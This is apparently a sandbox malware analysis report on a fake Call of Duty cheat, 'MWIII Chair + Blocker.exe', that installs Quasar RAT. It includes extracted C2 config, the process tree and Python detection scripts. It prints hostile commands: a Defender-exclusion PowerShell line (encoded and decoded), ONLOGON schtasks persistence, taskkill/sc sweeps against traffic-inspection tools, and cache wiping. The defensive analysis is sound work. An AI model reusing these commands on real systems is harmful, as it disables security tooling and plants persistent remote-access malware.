Analysis
  max time kernel:   60s
  max time network:  63s
  platform:          windows7_x64
  resource:          win7-20240708-en
  resource tags:     arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted:         11-07-2024 04:13
Static task:      static1
Behavioral task:  behavioral1   Sample: MWIII Chair + Blocker.exe   Resource: win7-20240708-en
Behavioral task:  behavioral2   Sample: MWIII Chair + Blocker.exe   Resource: win10v2004-20240709-en

The signatures and process tree below come from behavioral1 (the Windows 7 run); every yara_rule hit is prefixed behavioral1/.
General
  Target:  MWIII Chair + Blocker.exe
  Size:    47.7MB
  MD5:     479f465034137af69c31b1ba25752ddf
  SHA1:    1a437d072149e6a09ef81336e571ad7c6348fa6e
  SHA256:  72880513939d8b52af76c8796bf066a7d3e7df97e9ef5a1a5076e9178016867b
  SHA512:  f7eaf698eddc3b7f28a1c5d416a7332e20203c56109cd5fc709eea1f7f3d6500f7ac587bc969418d911563b26541cb95cc9de690b62fc5ecd8997a9d1927690d
  SSDEEP:  786432:NlHDtuFgKqlUdKijEIzQviTQ5nGgcPkdzteBG3NAfhO2nlSZYptRZOHOhC+dj:3DtuFbB7fUaTQ5GidBdCh7nLptpC+
Malware Config

Extracted: Quasar 1.4.1
  Server:           193.37.254.35:60553
                    08e34576-f933-4fe1-9756-64a65f86dc05
  encryption_key:   8DED0FEFCB0F93A016A6DAD812C6D6D58DEE8547
  install_name:     services86.exe
  log_directory:    Logs
  reconnect_delay:  3000
  startup_key:      services86
  subdirectory:     Files

  Cross-check against the behavioural run: subdirectory and install_name match the observed drop path C:\Windows\system32\Files\services86.exe, and startup_key is the name of the ONLOGON scheduled task ("services86") created by PIDs 912 and 836 in the process tree. The server is a raw IP:port, so the network indicator to hunt for is the socket 193.37.254.35:60553, not a domain.
Signatures

Quasar payload (3 IoCs)
  yara_rule family_quasar matched on:
  - behavioral1/files/0x000a00000001202c-2.dat
  - behavioral1/memory/2848-10-0x0000000000350000-0x0000000000674000-memory.dmp   (services86.exe, PID 2848)
  - behavioral1/memory/1292-51-0x00000000010D0000-0x00000000013F4000-memory.dmp   (services86.exe, PID 1292)

Executes dropped EXE (6 IoCs)
  pid   process
  2848  services86.exe
  2808  services64.exe
  2548  services64.exe
  2584  dependencies.exe
  1292  services86.exe
  1228  Process not Found

Loads dropped DLL (5 IoCs)
  pid   process
  2644  MWIII Chair + Blocker.exe   (3 loads)
  2548  services64.exe
  1228  Process not Found

UPX packed file (2 IoCs)
  yara_rule upx matched on:
  - behavioral1/files/0x0005000000019613-30.dat
  - behavioral1/memory/2548-35-0x000007FEF38C0000-0x000007FEF3D26000-memory.dmp   (services64.exe, PID 2548)

Power Settings (1 TTPs, 4 IoCs)
  powercfg controls all configurable power settings on a Windows system and can be abused to keep an infected host from locking or shutting down. Both invocations in this run are "Powercfg -h off", which disables hibernation and deletes hiberfil.sys; besides keeping the host awake, that removes a file memory forensics would otherwise recover RAM contents from.
  pid   process
  1028  cmd.exe
  1208  powercfg.exe
  744   cmd.exe
  2540  powercfg.exe

Drops file in System32 directory (5 IoCs)
  description                    ioc                                         process
  File opened for modification   C:\Windows\system32\Files                   services86.exe
  File opened for modification   C:\Windows\system32\Files\services86.exe    services86.exe
  File opened for modification   C:\Windows\system32\Files                   services86.exe
  File created                   C:\Windows\system32\Files\services86.exe    services86.exe
  File opened for modification   C:\Windows\system32\Files\services86.exe    services86.exe
  Writing under C:\Windows\system32 needs an administrative token; the sandbox ran the sample as Admin. The new folder and file name match the Quasar config's subdirectory "Files" and install_name "services86.exe".

Launches sc.exe (4 IoCs)
  sc.exe is the Windows utility for controlling services.
  pid   process
  2376  sc.exe
  1344  sc.exe
  2776  sc.exe
  1700  sc.exe

Command and Scripting Interpreter: PowerShell (1 IoCs)
  pid   process
  2696  powershell.exe

Detects Pyinstaller (1 IoCs)
  yara_rule pyinstaller matched on:
  - behavioral1/files/0x000700000001871e-13.dat

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Kills process with taskkill (16 IoCs)
  taskkill.exe pids: 1656, 540, 1980, 2480, 2960, 1788, 3012, 2436, 380, 1776, 2256, 2500, 692, 1812, 1596, 1608

Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process
  912   schtasks.exe
  836   schtasks.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid   process
  2696  powershell.exe
  2584  dependencies.exe   (7 hits)
  596   powershell.exe

Suspicious use of AdjustPrivilegeToken (32 IoCs)
  token                       pid    process
  SeDebugPrivilege            2696   powershell.exe
  SeDebugPrivilege            2848   services86.exe
  SeDebugPrivilege            1292   services86.exe
  SeDebugPrivilege            596    powershell.exe
  SeDebugPrivilege            taskkill.exe (16 hits): 1980, 540, 1788, 692, 1812, 380, 1596, 1776, 2480, 3012, 1656, 2256, 2960, 2500, 2436, 1608
  SeShutdownPrivilege         1208   powercfg.exe   (5 hits)
  SeCreatePagefilePrivilege   1208   powercfg.exe
  SeShutdownPrivilege         2540   powercfg.exe   (5 hits)
  SeCreatePagefilePrivilege   2540   powercfg.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   process
  1292  services86.exe
  SetWindowsHookEx is the API used to install window and keyboard hooks in user mode; it fires from the installed Quasar copy, not from the launcher.

Suspicious use of WriteProcessMemory (64 IoCs; 20 unique parent/child pairs, each reported several times)
  parent pid  parent process              child pid  procid_target
  2644        MWIII Chair + Blocker.exe   2696       30
  2644        MWIII Chair + Blocker.exe   2848       32
  2644        MWIII Chair + Blocker.exe   2808       33
  2808        services64.exe              2548       34
  2644        MWIII Chair + Blocker.exe   2584       35
  2848        services86.exe              912        37
  2848        services86.exe              1292       39
  1292        services86.exe              836        40
  2584        dependencies.exe            1592       42
  2584        dependencies.exe            1028       43
  1028        cmd.exe                     1208       45
  2584        dependencies.exe            744        46
  2584        dependencies.exe            2892       47
  2892        cmd.exe                     596        49
  744         cmd.exe                     2540       50
  2584        dependencies.exe            1972       51
  2584        dependencies.exe            1988       52
  2584        dependencies.exe            1992       53
  2584        dependencies.exe            1936       54
  2584        dependencies.exe            1092       55

Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
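The behaviours catalogued above (ONLOGON scheduled task into System32\Files, powercfg -h off, taskkill/sc against Fiddler, Wireshark and HTTP Debugger, an encoded PowerShell command, the IE cache wipe) are all visible in plain process-creation telemetry. The following is an added example, not tooling from the sandbox vendor or from the sample's author: it runs those rules over a constructed set of events and cross-checks the schtasks persistence against the extracted Quasar config from the Malware Config section. The command lines are copied from the report's process tree; the event envelope (Sysmon-like field names, a parent PID of 1000 for the launcher), the shortened base64 blob and the rule names are assumptions made for the demo.

```python
"""Rules for the behaviour listed under Signatures, run over process-creation
events, plus a cross-check of the schtasks persistence against the extracted
Quasar config. Added example: the command lines come from the report, the
event envelope and rule names are assumptions for the demo."""
import re
from dataclasses import dataclass

# Quasar fields as extracted in the Malware Config section of the report.
QUASAR_CONFIG = {"install_name": "services86.exe", "subdirectory": "Files",
                 "startup_key": "services86"}

# Name fragments of the analysis tools the helper binary kills or stops.
ANALYSIS_TOOLS = ("fiddler", "wireshark", "httpdebugger")


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str      # image file name only
    cmdline: str


def expected_quasar_artifacts(cfg, system32=r"C:\Windows\system32"):
    """Install path and task name a Quasar build with this config will create."""
    install = "\\".join([system32, cfg["subdirectory"], cfg["install_name"]])
    return {"install_path": install.lower(), "task_name": cfg["startup_key"].lower()}


def tag_event(ev, artifacts):
    """Return the rule tags that fire for one event (empty list if none)."""
    img, cmd, low = ev.image.lower(), ev.cmdline, ev.cmdline.lower()
    tags = []
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        onlogon = re.search(r"/sc\s+onlogon\b", cmd, re.I)
        highest = re.search(r"/rl\s+highest\b", cmd, re.I)
        tn = re.search(r'/tn\s+"?([^"\s]+)"?', cmd, re.I)
        tr = re.search(r'/tr\s+"([^"]+)"', cmd, re.I)
        if onlogon and highest:
            tags.append("schtasks-onlogon-highest")
        if (tn and tr and tn.group(1).lower() == artifacts["task_name"]
                and tr.group(1).lower() == artifacts["install_path"]):
            tags.append("quasar-persistence-matches-config")
    elif img == "powercfg.exe" and re.search(r"[-/](h|hibernate)\s+off\b", cmd, re.I):
        tags.append("powercfg-hibernation-disabled")
    elif img == "taskkill.exe" and re.search(r"\s/f\b", cmd, re.I):
        tags += [f"taskkill-analysis-tool:{t}" for t in ANALYSIS_TOOLS if t in low]
    elif img == "sc.exe":
        m = re.search(r"\bstop\s+(\S+)", cmd, re.I)
        if m:
            tags += [f"sc-stop-analysis-tool:{t}" for t in ANALYSIS_TOOLS
                     if t in m.group(1).lower()]
    elif img == "powershell.exe" and re.search(r"\s-e(nc|ncodedcommand)?\s", cmd, re.I):
        tags.append("powershell-encoded-command")
    elif img == "cmd.exe" and re.search(r"\brd\s+/s\s+/q\b", cmd, re.I) and "inetcache" in low:
        tags.append("browser-cache-wipe")
    return tags


def attribute_to_root(events):
    """Tag every event and attribute each finding to the top of its process chain."""
    by_pid = {e.pid: e for e in events}
    artifacts = expected_quasar_artifacts(QUASAR_CONFIG)

    def root_of(pid):
        seen = set()
        while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
            seen.add(pid)
            pid = by_pid[pid].ppid
        return pid

    return [(e.pid, root_of(e.pid), tag) for e in events for tag in tag_event(e, artifacts)]


# Constructed sample: PIDs and command lines from the report, envelope assumed.
SAMPLE_EVENTS = [
    Event(2644, 1000, "MWIII Chair + Blocker.exe",
          r'"C:\Users\Admin\AppData\Local\Temp\MWIII Chair + Blocker.exe"'),
    Event(2696, 2644, "powershell.exe",   # blob shortened; the rule only keys on the switch
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAj...PgA="'),
    Event(2848, 2644, "services86.exe", r'"C:\Users\Admin\AppData\Local\services86.exe"'),
    Event(912, 2848, "schtasks.exe",
          r'"schtasks" /create /tn "services86" /sc ONLOGON /tr "C:\Windows\system32\Files\services86.exe" /rl HIGHEST /f'),
    Event(2584, 2644, "dependencies.exe", r'"C:\Users\Admin\AppData\Local\dependencies.exe"'),
    Event(1028, 2584, "cmd.exe", r'"C:\Windows\System32\cmd.exe" /C Powercfg -h off'),
    Event(1208, 1028, "powercfg.exe", "Powercfg -h off"),
    Event(1972, 2584, "cmd.exe", r'cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1'),
    Event(1980, 1972, "taskkill.exe", r'taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T'),
    Event(1936, 2584, "cmd.exe", "cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1"),
    Event(2376, 1936, "sc.exe", "sc stop HTTPDebuggerPro"),
    Event(1092, 2584, "cmd.exe", "cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1"),
    Event(692, 1092, "taskkill.exe", "taskkill /IM HTTPDebuggerSvc.exe /F"),
    Event(1476, 2584, "cmd.exe",
          r'cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1'),
]

if __name__ == "__main__":
    for pid, root, tag in attribute_to_root(SAMPLE_EVENTS):
        print(f"pid {pid:>5}  root {root}  {tag}")
```

Keying each rule on the image name rather than on the full command line is deliberate: the cmd.exe wrappers carry the same text as their children, and matching on both would double-count every finding. Rooting each finding back to PID 2644 is what lets a single alert carry the whole chain (launcher, dropped services86.exe, dependencies.exe helper) instead of eight unrelated ones.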
Processes

[1] PID 2644  C:\Users\Admin\AppData\Local\Temp\MWIII Chair + Blocker.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\MWIII Chair + Blocker.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] PID 2696  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAegB3ACMAPgA="
      decoded (base64, UTF-16LE): <#tlv#>Add-MpPreference <#aem#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#cqh#> -Force <#wzw#>
      The <# ... #> block comments are filler meant to defeat string matching; the effective command is
      Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the whole user profile and the system drive from Windows Defender scanning. The image resolved under SysWOW64 because the 32-bit launcher's System32 path was redirected by WOW64.
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] PID 2848  C:\Users\Admin\AppData\Local\services86.exe
      cmd: "C:\Users\Admin\AppData\Local\services86.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] PID 912  C:\Windows\system32\schtasks.exe
        cmd: "schtasks" /create /tn "services86" /sc ONLOGON /tr "C:\Windows\system32\Files\services86.exe" /rl HIGHEST /f
        - Scheduled Task/Job: Scheduled Task

    [3] PID 1292  C:\Windows\system32\Files\services86.exe
        cmd: "C:\Windows\system32\Files\services86.exe"
        - Executes dropped EXE
        - Drops file in System32 directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

      [4] PID 836  C:\Windows\system32\schtasks.exe
          cmd: "schtasks" /create /tn "services86" /sc ONLOGON /tr "C:\Windows\system32\Files\services86.exe" /rl HIGHEST /f
          - Scheduled Task/Job: Scheduled Task

  [2] PID 2808  C:\Users\Admin\AppData\Local\services64.exe
      cmd: "C:\Users\Admin\AppData\Local\services64.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] PID 2548  C:\Users\Admin\AppData\Local\services64.exe
        cmd: "C:\Users\Admin\AppData\Local\services64.exe"
        - Executes dropped EXE
        - Loads dropped DLL

  [2] PID 2584  C:\Users\Admin\AppData\Local\dependencies.exe
      cmd: "C:\Users\Admin\AppData\Local\dependencies.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    [3] PID 1592  C:\Windows\system32\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c cls

    [3] PID 1028  C:\Windows\System32\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /C Powercfg -h off
        - Power Settings
        - Suspicious use of WriteProcessMemory
      [4] PID 1208  C:\Windows\system32\powercfg.exe
          cmd: Powercfg -h off
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 744  C:\Windows\System32\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /C Powercfg -h off
        - Power Settings
        - Suspicious use of WriteProcessMemory
      [4] PID 2540  C:\Windows\system32\powercfg.exe
          cmd: Powercfg -h off
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 2892  C:\Windows\system32\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c powershell "Confirm-SecureBootUEFI" > C:\secureboot_status.txt
        - Suspicious use of WriteProcessMemory
      [4] PID 596  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell "Confirm-SecureBootUEFI"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        Confirm-SecureBootUEFI ships with Windows 8 and later, so on this Windows 7 image the command fails; the redirect still creates C:\secureboot_status.txt, a host artifact worth looking for.

    The helper then runs the following six-command anti-analysis sequence four times. Each step is a cmd.exe child of PID 2584 at depth 3 that spawns the named tool at depth 4; the signatures raised on the child are given in brackets.

      a) cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
         -> taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T          [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
      b) cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
         -> taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T        [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
      c) cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
         -> taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T     [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
      d) cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
         -> sc stop HTTPDebuggerPro                                     [Launches sc.exe]
      e) cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1
         -> taskkill /IM HTTPDebuggerSvc.exe /F                         [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
      f) cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
         (no child process, no signatures; wipes the IE cache directory)

      PIDs per round (cmd.exe -> child):
        round 1:  a) 1972 -> 1980   b) 1988 -> 1788   c) 1992 -> 540    d) 1936 -> 2376   e) 1092 -> 692    f) 1476

        between rounds 1 and 2 the helper hashes its own image:
        [3] PID 1336  C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\dependencies.exe" MD5
          [4] PID 780  C:\Windows\system32\certutil.exe
              cmd: certutil -hashfile "C:\Users\Admin\AppData\Local\dependencies.exe" MD5

        round 2:  a) 2260 -> 1596   b) 2176 -> 380    c) 2140 -> 1776   d) 1808 -> 1344   e) 1920 -> 1812   f) 3036
        round 3:  a) 1352 -> 2960   b) 1772 -> 2436   c) 1796 -> 2480   d) 1928 -> 1700   e) 1308 -> 3012   f) 1736
        round 4:  a) 1932 -> 2256   b) 1924 -> 1608   c) 1724 -> 1656   d) 680 -> 2776    e) 1056 -> 2500   f) 2356

    The targets are Fiddler, Wireshark and HTTP Debugger, all traffic-inspection tools: the helper is trying to keep its own network activity from being observed, and the repeated rounds suggest it re-runs the sweep on a timer.
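The -EncodedCommand value on PID 2696 above is the one piece of the tree that cannot be read at a glance. The following is an added example, not part of the sandbox report: it decodes the blob exactly as powershell.exe does (base64 of UTF-16LE text), strips the <# ... #> filler comments, and classifies the result. The ENCODED constant is copied from the report; the tamper patterns, the -ExclusionPath parser and the tag names are my own.

```python
"""Decode a PowerShell -EncodedCommand blob and recover the effective command
hidden behind junk block comments. Added example for this report; ENCODED is
the blob from PID 2696, the patterns and tag names are assumptions."""
import base64
import re

# Copied verbatim from the process tree (PID 2696).
ENCODED = (
    "PAAjAHQAbAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAGEAZQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAA"
    "KAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMA"
    "eQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcQBoACMAPgAgAC0ARgBvAHIA"
    "YwBlACAAPAAjAHcAegB3ACMAPgA="
)


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def strip_junk(script):
    """Drop <# ... #> block comments (used here as filler) and collapse whitespace."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


# Tamper patterns, matched case-insensitively against the de-junked script.
TAMPER_PATTERNS = {
    "defender-exclusion": r"\bAdd-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b",
    "defender-disable": r"\bSet-MpPreference\b.*?-Disable\w+",
    "amsi-bypass": r"\bamsiInitFailed\b|\bAmsiUtils\b",
}


def classify(script):
    return sorted(tag for tag, pat in TAMPER_PATTERNS.items() if re.search(pat, script, re.I))


def exclusion_paths(script):
    """Entries passed to -ExclusionPath, with quotes and the @( ) array wrapper removed."""
    m = re.search(r"-ExclusionPath\s+(@\([^)]*\)|\S+)", script, re.I)
    if not m:
        return []
    return [p.strip().strip("'\"") for p in m.group(1).strip("@()").split(",") if p.strip()]


def whole_drive_excluded(paths):
    """$env:SystemDrive or a bare drive letter switches Defender off for the whole disk."""
    return any(re.fullmatch(r"\$env:SystemDrive|[A-Za-z]:\\?", p, re.I) for p in paths)


def analyse(b64):
    decoded = decode_encoded_command(b64)
    effective = strip_junk(decoded)
    paths = exclusion_paths(effective)
    return {
        "decoded": decoded,
        "effective": effective,
        "junk_comments": len(re.findall(r"<#.*?#>", decoded, re.S)),
        "tags": classify(effective),
        "exclusion_paths": paths,
        "whole_drive": whole_drive_excluded(paths),
    }


if __name__ == "__main__":
    for key, value in analyse(ENCODED).items():
        print(f"{key:>16}: {value}")
```

Two points worth carrying into detection content: match on the decoded text, never on the raw base64 (a single inserted comment changes every byte of the encoding), and treat $env:SystemDrive or a bare drive letter in -ExclusionPath as equivalent to disabling Defender, which is what this sample does before it drops anything.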
Network
MITRE ATT&CK Enterprise v15

Execution
  Command and Scripting Interpreter (1): PowerShell (1)
  Scheduled Task/Job (1): Scheduled Task (1)
  System Services (1): Service Execution (1)

Persistence
  Create or Modify System Process (1): Windows Service (1)
  Power Settings (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Downloads

Filesize: 1.4MB
  MD5     4a6afa2200b1918c413d511c5a3c041c
  SHA1    39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
  SHA256  bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
  SHA512  dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

Filesize: 10.5MB
  MD5     5f9f741929a6bf741b958638c397bb8d
  SHA1    e370edb712a9ace94aa3221dcb9b271953c245ff
  SHA256  9a768722b28c4309ab8ad25b7a94bf4eb6192746d47c69202b17373b7e2dcaa8
  SHA512  31ca935fe41121d7722fcbe41a803450d9d790f4387b1df68ddfc3865183403f18240d0c8ca514a3b4fb94e9b37cc40b5f8af19400d691099658dbe5279b78cd

Filesize: 34.1MB
  MD5     a8a0683a64c14f55844fa0ad6ed345bd
  SHA1    039100e09e95c19aa19caeb7641417e3d065061d
  SHA256  9466fb159deb56e656a507de7f621eade9f57ef013f980e5bbc853c9b3df9468
  SHA512  69d12fb87bcfde005a12e8e60733fbf799d98cd0957669f59db6b485f13067076af82ca07fdcb472ca78a963baef718fa441be9693cce1b3a0eabb84705a7b9d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87HFYSZYPUNT6REUV2YE.temp
Filesize: 7KB
  MD5     9396a80a14db337e63200c7fdc4ae79d
  SHA1    31520d7f0ac3ea2f18c7919f8f48c2c2ac203c45
  SHA256  bc991c88ca75ffea06b8a26bdecc73d7a1aa1b30119da427b9531ce9e0b98f0e
  SHA512  739179c3bbd06589f1809ba7a88d687550551597cc376b4610851197db57b637549d1219b945a3844035a58a1be0d0e26d5fcffef85009391bf156fd3e94db7f

Filesize: 447B
  MD5     cf8355d29a9d97cf5d6a673e64f9fcda
  SHA1    9050f2dd8c50258f22fea4278268357d4133668f
  SHA256  7fc3a10f21c5405061e1eff734790d1a640ddc1971a84e60070288af8bb161d3
  SHA512  9669cb9c7100047e4f0c0478edc3c390fde9fa8ae98e5aaf4c204520f6eb3e57c11eb388f72986afd21781c24b2796c39e1aa291d34f481b0de9c94b81bd1a48

Filesize: 3.1MB
  MD5     fd0a43d6dbd1e8d51c7fd88fcec20b77
  SHA1    09e5c01eb89bc3f56505776b4029170012329671
  SHA256  c545f6df14ab1fa59235838ddb48572637fdebf237d96d0978cd55acbaa86311
  SHA512  594619cd351091392a039543d6c766545cac477becff14ad0116b881a376e924d98ef116c66be41181daa41c7d1b6c36ea95bf028f92ce29418f22311175893e